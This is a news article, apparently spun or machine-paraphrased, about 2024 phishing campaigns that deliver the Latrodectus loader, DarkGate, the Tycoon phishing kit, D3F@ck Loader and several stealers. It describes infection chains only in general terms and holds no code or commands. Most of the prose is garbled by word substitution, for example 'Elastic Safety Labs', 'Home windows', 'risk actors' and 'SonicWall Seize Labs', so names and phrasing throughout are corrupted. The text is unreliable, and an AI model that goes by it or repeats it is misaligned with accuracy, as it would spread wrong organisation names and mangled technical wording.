Cybersecurity researchers have noticed a spike in electronic mail phishing campaigns beginning early March 2024 that delivers Latrodectus, a nascent malware loader believed to be the successor to the IcedID malware.
“These campaigns typically involve a recognizable infection chain involving oversized JavaScript files that utilize WMI’s ability to invoke msiexec.exe and install a remotely-hosted MSI file, remotely hosted on a WEBDAV share,” Elastic Safety Labs researchers Daniel Stepanic and Samir Bousseaden stated.
Latrodectus comes with commonplace capabilities which are sometimes anticipated of malware designed to deploy extra payloads equivalent to QakBot, DarkGate, and PikaBot, permitting risk actors to conduct numerous post-exploitation actions.
An evaluation of the most recent Latrodectus artifacts has revealed an in depth deal with enumeration and execution in addition to the incorporation of a self-delete approach to delete working information.
The malware, in addition to masquerading as libraries related to authentic software program, makes use of supply code obfuscation and performs anti-analysis checks to be able to forestall its execution from continuing additional in a debugging or sandboxed setting.
Latrodectus additionally units up persistence on Home windows hosts utilizing a scheduled process and establishes contact with a command-and-control (C2) server over HTTPS to obtain instructions that permit it to gather system info; replace, restart, and terminate itself; and run shellcode, DLL, and executable information.
Two new instructions added to the malware since its emergence late final 12 months embody the power to enumerate information within the desktop listing and retrieve all the working course of ancestry from the contaminated machine.
It additional helps a command to obtain and execute IcedID (command ID 18) from the C2 server, though Elastic stated it didn’t detect this habits within the wild.
“There definitely is some kind of development connection or working arrangement between IcedID and Latrodectus,” the researchers stated.
“One hypothesis being considered is that LATRODECTUS is being actively developed as a replacement for IcedID, and the handler (#18) was included until malware authors were satisfied with Latrodectus’ capabilities.”
The event comes as Forcepoint dissected a phishing marketing campaign that makes use of invoice-themed electronic mail lures to ship the DarkGate malware.
The assault chain begins with phishing emails posing as QuickBooks invoices, urging customers to put in Java by clicking on an embedded hyperlink that results in a malicious Java archive (JAR). The JAR file acts as a conduit to run a PowerShell script accountable for downloading and launching DarkGate by way of an AutoIT script.
Social engineering campaigns have additionally employed an up to date model of a phishing-as-a-service (PhaaS) platform referred to as Tycoon to reap Microsoft 365 and Gmail session cookies and bypass multi-factor authentication (MFA) protections.
“This new version boasts enhanced detection evasion capabilities that make it even harder for security systems to identify and block the kit,” Proofpoint stated. “Significant alterations to the kit’s JavaScript and HTML code have been implemented to increase its stealthiness and effectiveness.”
These embody obfuscation strategies to make the supply code tougher to grasp and using dynamic code technology to tweak the code each time it runs, thus evading signature-based detection methods.
Different social engineering campaigns detected in March 2024 have taken benefit of Google adverts impersonating Calendly and Rufus to propagate one other malware loader referred to as D3F@ck Loader, which first emerged in cybercrime boards in January 2024, and in the end drop Raccoon Stealer and DanaBot.
“The case of D3F@ck Loader illustrates how malware-as-a-service (MaaS) continues to evolve, utilizing [Extended Validation] certificates to bypass trusted security measures,” cybersecurity firm eSentire famous late final month.
The disclosure additionally follows the emergence of recent stealer malware households like Fletchen Stealer, WaveStealer, zEus Stealer, and Ziraat Stealer, even because the Remcos distant entry trojan (RAT) has been noticed utilizing a PrivateLoader module to reinforce its capabilities.
“By installing VB scripts, altering the registry, and setting up services to restart the malware at variable times or by control, [Remcos] malware is able to infiltrate a system completely and remain undetected,” the SonicWall Seize Labs risk analysis group stated.
